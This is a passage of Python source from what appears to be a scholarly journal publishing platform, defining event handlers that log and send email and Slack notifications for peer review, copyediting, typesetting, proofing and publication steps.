reviewer has been requested.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = 'A review request was added to \"{0}\" for user {1}'.format(\n article.title,\n review_assignment.reviewer.full_name(),\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Review Request',\n 'target': article}\n\n # send to requested reviewer\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_assignment',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict,\n )\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_review_complete_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has completed his or her\n review. It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n request.user = review_assignment.reviewer\n\n description = '{0} completed the review of \"{1}\": {2}'.format(\n review_assignment.reviewer.full_name(),\n article.title,\n review_assignment.get_decision_display(),\n )\n\n util_models.LogEntry.add_entry(\n types='Review Complete',\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_reviewer_acknowledgement',\n 'subject_review_complete_reviewer_acknowledgement',\n review_assignment.reviewer.email,\n context,\n )\n\n # send to editor\n context['review_in_review_url'] = review_in_review_url\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_acknowledgement',\n 'subject_review_complete_acknowledgement',\n editor.email,\n context,\n )\n\n\ndef send_reviewer_accepted_or_decline_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has either accepted or\n declined to review. It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, accepted and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n accepted = kwargs['accepted']\n\n description = '{0} {1} to review {2}'.format(\n review_assignment.reviewer.full_name(),\n ('accepted' if accepted else 'declined'),\n article.title,\n )\n\n util_models.LogEntry.add_entry(\n types='Review request {0}'.format(('accepted' if accepted else 'declined')),\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_url = review_logic.get_review_url(\n request,\n review_assignment,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n reviewer_context = context\n reviewer_context['review_url'] = review_url\n editor_context = context\n editor_context['review_in_review_url'] = review_in_review_url\n\n # send to slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n if accepted:\n context[\"reviewer_decision\"] = _(\"accepted\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_accept_acknowledgement',\n 'subject_review_accept_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n else:\n context[\"reviewer_decision\"] = _(\"declined\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_decline_acknowledgement',\n 'subject_review_decline_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n # send to editor\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'reviewer_acknowledgement',\n 'subject_reviewer_acknowledgement',\n editor.email,\n editor_context,\n )\n\n\ndef send_submission_acknowledgement(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it\n notifies site operators of a submission. It is\n wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes article and request\n :return: None\n \"\"\"\n\n article = kwargs['article']\n request = kwargs['request']\n\n util_models.LogEntry.add_entry(\n types='Submission Complete',\n description='A new article {0} was submitted'.format(article.title),\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': 'A new article {0} was submitted'.format(article.title),\n 'types': 'New Submission Acknowledgement',\n 'target': article,\n }\n\n # generate URL\n review_unassigned_article_url = request.journal.site_url(\n path=reverse(\n 'review_unassigned_article',\n kwargs={'article_id': article.pk},\n )\n )\n notify_helpers.send_slack(\n request,\n 'New submission: {0} {1}'.format(\n article.title,\n review_unassigned_article_url,\n ),\n ['slack_editors'])\n\n # send to author\n context = {\n 'article': article,\n 'request': request,\n 'review_unassigned_article_url': review_unassigned_article_url,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_acknowledgement',\n 'subject_submission_acknowledgement',\n article.correspondence_author.email,\n context,\n log_dict=log_dict,\n )\n\n # send to all editors\n editors_to_email = setting_handler.get_setting(\n 'general', 'editors_for_notification', request.journal).processed_value\n\n if editors_to_email:\n editor_pks = [int(pk) for pk in editors_to_email]\n editor_emails = {\n role.user.email for role in core_models.AccountRole.objects.filter(\n role__slug='editor',\n user__id__in=editor_pks,\n )\n }\n else:\n editor_emails = set(request.journal.editor_emails)\n\n assigned_to_section = (\n article.section.editors.all() | article.section.section_editors.all())\n\n editor_emails |= {editor.email for editor in assigned_to_section}\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'editor_new_submission',\n 'subject_editor_new_submission',\n editor_emails,\n context,\n log_dict=log_dict,\n custom_reply_to=[f\"noreply{settings.DUMMY_EMAIL_DOMAIN}\"]\n )\n\n\ndef send_article_decision(**kwargs):\n article = kwargs['article']\n request = kwargs['request']\n decision = kwargs['decision']\n subject = \"\"\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s article \"{1}\" has been {2}ed by {3}'.format(article.correspondence_author.full_name(),\n article.title,\n decision,\n request.user.full_name())\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Article Decision',\n 'target': article}\n\n if decision == ED.ACCEPT.value:\n subject = 'subject_review_decision_accept'\n elif decision == ED.DECLINE.value:\n subject = 'subject_review_decision_decline'\n elif decision == ED.UNDECLINE.value:\n subject = 'subject_review_decision_undecline'\n\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n subject,\n article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_revisions_request(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0} has requested revisions for {1} due on {2}'.format(\n request.user.full_name(),\n revision.article.title,\n revision.date_due,\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Revision Request',\n 'target': revision.article,\n }\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_request_revisions',\n revision.article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(\n request,\n description,\n ['slack_editors'],\n )\n\n\ndef send_revisions_complete(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n\n action_text = ''\n for action in revision.actions.all():\n action_text = \"{0}<br><br>{1} - {2}\".format(action_text, action.logged, action.text)\n\n description = ('<p>{0} has completed revisions for {1}</p> Actions:<br>{2}'\n ''.format(request.user.full_name(), revision.article.title, action_text)\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_revisions_complete_receipt',\n {editor.email for editor in get_assignment_editors(revision)},\n description,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n util_models.LogEntry.add_entry(\n types='Revisions Complete', description=action_text, level='Info',\n request=request, target=revision.article,\n )\n\n\ndef send_revisions_author_receipt(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n\n description = '{0} has completed revisions for {1}'.format(\n request.user.full_name(),\n revision.article.title,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Revisions Complete',\n 'target': revision.article,\n }\n context = {\n 'revision': revision,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'revisions_complete_receipt',\n 'subject_revisions_complete_receipt',\n revision.article.correspondence_author.email,\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(\n request,\n description,\n ['slack_editors'],\n )\n\n\ndef send_copyedit_assignment(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has requested copyediting for {1} due on {2}'.format(\n request.user.full_name(),\n copyedit_assignment.article.title,\n copyedit_assignment.due,\n )\n\n if not skip:\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Copyedit Assignment',\n 'target': copyedit_assignment.article,\n }\n response = notify_helpers.send_email_with_body_from_user(\n request, 'subject_copyeditor_assignment_notification',\n copyedit_assignment.copyeditor.email,\n user_message_content, log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_updated(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n skip = kwargs.get('skip', False)\n\n if not skip:\n # send to slack\n notify_helpers.send_slack(request,\n 'Copyedit assignment {0} updated'.format(copyedit_assignment.pk),\n ['slack_editors'])\n\n log_dict = {'level': 'Info',\n 'action_text': 'Copyedit assignment #{number} update.'.format(number=copyedit_assignment.pk),\n 'types': 'Revision Request',\n 'target': copyedit_assignment.article}\n\n # send to author\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'copyedit_updated',\n 'subject_copyedit_updated',\n copyedit_assignment.copyeditor.email,\n context={'request': request,\n 'copyedit_assignment': copyedit_assignment},\n log_dict=log_dict)\n\n\ndef send_copyedit_deleted(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n skip = kwargs.get('skip', False)\n\n description = 'Copyedit task {0} for article {1} deleted.'.format(copyedit_assignment.pk,\n copyedit_assignment.article.title)\n\n if not skip:\n # send to slack\n notify_helpers.send_slack(request,\n 'Copyedit assignment {0} updated'.format(copyedit_assignment.pk),\n ['slack_editors'])\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Assignment Deleted',\n 'target': copyedit_assignment.article}\n # send to copyeditor\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'copyedit_deleted',\n 'subject_copyedit_deleted',\n copyedit_assignment.copyeditor.email,\n context={'request': request,\n 'copyedit_assignment': copyedit_assignment},\n log_dict=log_dict)\n\n\ndef send_copyedit_decision(**kwargs):\n request = kwargs['request']\n decision = kwargs[\"decision\"]\n copyedit_assignment = kwargs['copyedit_assignment']\n\n description = '{0} has {1}ed copyediting task for {2} due on {3}.'.format(\n copyedit_assignment.copyeditor.full_name(),\n decision,\n copyedit_assignment.article.title,\n copyedit_assignment.due)\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyediting Decision',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyediting_decision',\n copyedit_assignment.editor.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_author_review(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has requested copyedit review for {1} from {2}'.format(\n request.user.full_name(),\n copyedit_assignment.article.title,\n copyedit_assignment.article.correspondence_author.full_name())\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Author Review',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyeditor_notify_author',\n copyedit_assignment.article.correspondence_author.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_complete(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n article = kwargs['article']\n\n description = 'Copyediting requested by {0} from {1} for article {2} ' \\\n 'has been completed'.format(\n request.user.full_name(),\n copyedit_assignment.copyeditor.full_name(),\n article.title\n )\n\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Copyedit Complete',\n 'target': article,\n }\n article_copyediting_url = request.journal.site_url(reverse(\n 'article_copyediting', args=[article.pk],\n ))\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'copyeditor_notify_editor',\n 'subject_copyeditor_notify_editor',\n copyedit_assignment.editor.email,\n context={\n 'assignment': copyedit_assignment,\n 'article_copyediting_url': article_copyediting_url,\n },\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_author_copyedit_deleted(**kwargs):\n request = kwargs.get('request')\n author_review = kwargs.get('author_review')\n subject = kwargs.get('subject')\n user_message_content = kwargs.get('user_message_content')\n skip = kwargs.get('skip', False)\n\n description = '{0} has deleted a copyedit review for {1} from {2}'.format(\n request.user.full_name(),\n author_review.assignment.article.title,\n author_review.assignment.article.correspondence_author.full_name(),\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Author Copyedit Review Deleted',\n 'target': author_review.assignment.article,\n }\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n subject,\n author_review.assignment.article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict,\n )\n else:\n util_models.LogEntry.add_entry(\n 'Author Copyedit Review Deleted',\n description,\n 'Info',\n request.user,\n request,\n author_review.assignment.article,\n )\n\n\ndef send_copyedit_ack(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has acknowledged copyediting for {1}'.format(request.user.full_name(),\n copyedit_assignment.article.title, )\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Acknowledgement',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyeditor_ack',\n copyedit_assignment.copyeditor.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_reopen(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has reopened copyediting for {1} from {2}'.format(request.user.full_name(),\n copyedit_assignment.article.title,\n copyedit_assignment.copyeditor.full_name())\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Complete',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyeditor_reopen_task',\n copyedit_assignment.copyeditor.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_assignment(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has been assigned as a typesetter for {1}'.format(typeset_task.typesetter.full_name(),\n typeset_task.assignment.article.title)\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetting Assignment',\n 'target': typeset_task.assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_typesetter_notification',\n typeset_task.typesetter.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_decision(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n decision = kwargs['decision']\n\n description = '{0} has {1}ed the typesetting task for {2}'.format(typeset_task.typesetter.full_name(),\n decision,\n typeset_task.assignment.article.title)\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetter Decision',\n 'target': typeset_task.assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'Article Typesetting Decision',\n typeset_task.assignment.production_manager.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_task_deleted(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset']\n\n description = '{0} has deleted a typesetter task assigned to {1} for article {2}'.format(\n request.user.full_name(),\n typeset_task.typesetter.full_name(),\n typeset_task.assignment.article.title,\n )\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetter Assignment Deleted',\n 'target': typeset_task.assignment.article}\n\n # send to author\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'typeset_deleted',\n 'subject_typeset_deleted',\n typeset_task.typesetter.email,\n context={'request': request,\n 'typeset_task': typeset_task}, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_complete(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n\n description = '{0} has completed typesetting for article {1}. \\n\\nThe following note was supplied:\\n\\n{2}'.format(\n typeset_task.typesetter.full_name(),\n typeset_task.assignment.article.title,\n typeset_task.note_from_typesetter,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Typesetting Assignment Complete',\n 'target': typeset_task.assignment.article,\n }\n\n production_article_url = request.journal.site_url(\n path=reverse(\n 'production_article',\n kwargs={'article_id': typeset_task.assignment.article.pk},\n )\n )\n\n context = {\n 'production_article_url': production_article_url,\n 'typeset_task': typeset_task,\n 'production_assignment': typeset_task.assignment,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'typesetter_complete_notification',\n 'subject_typesetter_complete_notification',\n typeset_task.assignment.production_manager.email,\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_production_complete(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n user_content_message = kwargs['user_content_message']\n assignment = kwargs['assignment']\n\n description = 'Production has been completed for article {0}.'.format(article.title)\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Production Complete',\n 'target': article,\n }\n\n for task in assignment.typesettask_set.all():\n notify_helpers.send_email_with_body_from_user(\n request,\n 'Article Production Complete',\n task.typesetter.email,\n user_content_message,\n )\n\n context = {\n 'article': article,\n 'assignment': assignment,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'production_complete',\n 'subject_production_complete',\n article.editor_emails(),\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef fire_proofing_manager_assignment(**kwargs):\n request = kwargs['request']\n proofing_assignment = kwargs['proofing_assignment']\n article = proofing_assignment.article\n\n description = '{0} has been assigned as proofing manager for {1}'.format(\n proofing_assignment.proofing_manager.full_name(),\n article.title,\n )\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Proofing Manager Assigned',\n 'target': article,\n }\n\n proofing_url = request.journal.site_url(reverse(\n 'proofing_article', args=[article.pk]\n ))\n\n context = {\n 'request': request,\n 'proofing_assignment': proofing_assignment,\n 'article': article,\n 'proofing_article_url': proofing_url,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_proofing_manager',\n 'subject_notify_proofing_manager',\n proofing_assignment.proofing_manager.email,\n context,\n log_dict=log_dict,\n )\n\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef cancel_proofing_task(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n proofing_task = kwargs['proofing_task']\n user_content_message = kwargs.get('user_content_message', '')\n\n description = 'Proofing request for article {0} from {1} has been cancelled by {2}'.format(\n article.title,\n proofing_task.proofreader.full_name(),\n request.user.full_name()\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofing Task Cancelled',\n 'target': article}\n context = {'request': request, 'proofing_task': proofing_task, 'user_content_message': user_content_message}\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'notify_proofreader_cancelled',\n 'subject_notify_proofreader_cancelled',\n proofing_task.proofreader.email,\n context, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef edit_proofing_task(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n proofing_task = kwargs['proofing_task']\n\n description = 'Proofing request for article {0} from {1} has been edited by {2}'.format(\n article.title,\n proofing_task.proofreader.full_name(),\n request.user.full_name()\n )\n context = {'request': request, 'proofing_task': proofing_task}\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofing Task Edited',\n 'target': article}\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'notify_proofreader_edited',\n 'subject_notify_proofreader_edited',\n proofing_task.proofreader.email,\n context, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef notify_proofreader(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n proofing_task = kwargs['proofing_task']\n user_content_message = kwargs['user_content_message']\n\n description = 'Proofing request for article {0} from {1} has been requested by {2}'.format(\n article.title,\n proofing_task.proofreader.full_name(),\n request.user.full_name()\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofreading Requested',\n 'target': article}\n notify_helpers.send_email_with_body_from_user(request, 'subject_notify_proofreader_assignment',\n proofing_task.proofreader.email,\n user_content_message, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofreader_decision(**kwargs):\n request = kwargs['request']\n proofing_task = kwargs['proofing_task']\n decision = kwargs['decision']\n\n description = '{0} has made a decision for proofing task on {1}: {2}'.format(\n proofing_task.proofreader.full_name(),\n proofing_task.round.assignment.article.title,\n decision\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofreading Update',\n 'target': proofing_task.round.assignment.article}\n notify_helpers.send_email_with_body_from_user(request, 'Article Proofreading Update',\n proofing_task.round.assignment.proofing_manager.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofreader_complete_notification(**kwargs):\n request = kwargs['request']\n proofing_task = kwargs['proofing_task']\n article = kwargs['article']\n\n description = '{0} has completed a proofing task for {1}'.format(\n proofing_task.proofreader.full_name(),\n article.title,\n )\n proofing_url = request.journal.site_url(reverse(\n 'proofing_article', args=[article.pk]\n ))\n context = {\n 'proofing_task': proofing_task,\n 'proofing_article_url': proofing_url,\n\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_proofreader_complete',\n 'subject_notify_proofreader_complete',\n proofing_task.round.assignment.proofing_manager.email,\n context,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofing_typeset_request(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n article = kwargs['article']\n user_content_message = kwargs['user_content_message']\n skip = kwargs['skip']\n\n description = '{0} has requested typesetting updates from {1} for {2}'.format(\n request.user.full_name(),\n typeset_task.typesetter.full_name(),\n article.title,\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetting Updates Requested',\n 'target': article}\n if not skip:\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_user(\n request, 'subject_notify_typesetter_proofing_changes',\n typeset_task.typesetter.email,\n user_content_message, log_dict=log_dict)\n\n\ndef send_proofing_typeset_decision(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n decision = kwargs['decision']\n\n description = '{0} has made a decision for proofing task on {1}: {2}'.format(\n typeset_task.typesetter.full_name(),\n typeset_task.proofing_task.round.assignment.article.title,\n decision\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofing Typesetting',\n 'target': typeset_task.proofing_task.round.assignment.article}\n notify_helpers.send_email_with_body_from_user(request, 'Proofing Typesetting Changes',\n typeset_task.proofing_task.round.assignment.proofing_manager.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_corrections_complete(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n article = kwargs['article']\n\n description = '{0} has completed corrections task for article {1} (proofing task {2})'.format(\n request.user.full_name(),\n article.title,\n typeset_task.pk,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Proofing Typesetting Complete',\n 'target': typeset_task.proofing_task.round.assignment.article,\n }\n proofing_article_url = request.journal.site_url(\n path=reverse(\n 'production_article',\n kwargs={'article_id': typeset_task.proofing_task.assignment.article.pk},\n )\n )\n context = {\n 'typeset_task': typeset_task,\n 'proofing_article_url': proofing_article_url,\n 'production_assignment': typeset_task.proofing_task.assignment,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'typesetter_corrections_complete',\n 'subject_typesetter_corrections_complete',\n article.proofingassignment.proofing_manager.email,\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofing_ack(**kwargs):\n request = kwargs['request']\n user_message = kwargs['user_message']\n article = kwargs['article']\n model_object = kwargs['model_object']\n model_name = kwargs['model_name']\n skip = kwargs['skip']\n\n description = \"{0} has acknowledged a task , {1}, by {2} for article {3}\".format(request.user,\n model_name,\n model_object.actor().full_name(),\n article.title)\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(request, 'Proofing Acknowledgement',\n model_object.actor().email,\n user_message)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofing_complete(**kwargs):\n request = kwargs['request']\n user_message = kwargs['user_message']\n article = kwargs['article']\n skip = kwargs['skip']\n\n description = \"Proofing is now complete for {0}\".format(article.title)\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Proofing Complete',\n 'target': article,\n }\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_notify_editor_proofing_complete',\n article.editor_emails(),\n user_message,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_author_publication_notification(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n user_message = kwargs['user_message']\n section_editors = kwargs['section_editors']\n peer_reviewers = kwargs['peer_reviewers']\n\n description = \"Article, {0}, set for publication on {1}, by {2}\".format(article.title,\n article.date_published,\n request.user.full_name())\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Article Published',\n 'target': article}\n\n notify_helpers.send_email_with_body_from_user(request,\n 'subject_author_publication',\n article.correspondence_author.email,\n user_message, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # Check for SEs and PRs and notify them as well\n if section_editors:\n for editor in article.section_editors():\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'section_editor_pub_notification',\n 'subject_section_editor_pub_notification',\n editor.email,\n {'article': article, 'editor': editor},\n )\n\n if peer_reviewers:\n reviewers = {review_assignment.reviewer for review_assignment in article.completed_reviews_with_decision}\n for reviewer in reviewers:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'peer_reviewer_pub_notification',\n 'subject_peer_reviewer_pub_notification',\n reviewer.email,\n {'article': article, 'reviewer': reviewer},\n )\n\n\ndef review_sec_override_notification(**kwargs):\n request = kwargs['request']\n override = kwargs['override']\n\n description = \"{0} overrode their access to {1}\".format(override.editor.full_name(), override.article.title)\n log_dict = {'level': 'Warning', 'action_text': description, 'types': 'Security Override',\n 'target': override.article}\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_user(request, 'Review Security Override',\n request.journal.editor_emails,\n description, log_dict=log_dict)\n\n\ndef send_draft_decison(**kwargs):\n request = kwargs['request']\n draft = kwargs['draft']\n article = kwargs['article']\n\n description = \"Section Editor {0} has drafted a decision for Article {1}\".format(\n draft.section_editor.full_name(), article.title)\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Draft Decision',\n 'target': article,\n }\n review_edit_draft_decision_url = request.journal.site_url(\n path=reverse(\n 'review_edit_draft_decision', args=[article.pk, draft.pk]\n )\n )\n context = {\n 'draft': draft,\n 'article': article,\n 'review_edit_draft_decision_url': review_edit_draft_decision_url,\n }\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'draft_editor_message',\n 'subject_draft_editor_message',\n draft.editor.email if draft.editor else request.journal.editor_emails,\n context,\n log_dict=log_dict,\n )\n\n\ndef send_author_copyedit_complete(**kwargs):\n request = kwargs['request']\n copyedit = kwargs['copyedit']\n author_review = kwargs['author_review']\n\n editor_review_url = request.journal.site_url(\n path=reverse(\n 'editor_review',\n kwargs={\n 'article_id': copyedit.article.pk,\n 'copyedit_id': copyedit.pk,\n }\n )\n )\n description = \"Author {0} has completed their copyediting task for article {1}\".format(\n author_review.author.full_name(),\n copyedit.article.title,\n )\n context = {\n 'copyedit': copyedit,\n 'author_review': author_review,\n 'editor_review_url': editor_review_url,\n }\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'author_copyedit_complete',\n 'subject_author_copyedit_complete',\n copyedit.editor.email,\n context,\n )\n\n\ndef preprint_submission(**kwargs):\n \"\"\"\n Called by events.Event.ON_PRePINT_SUBMISSIONS, logs and emails the author\n and preprint 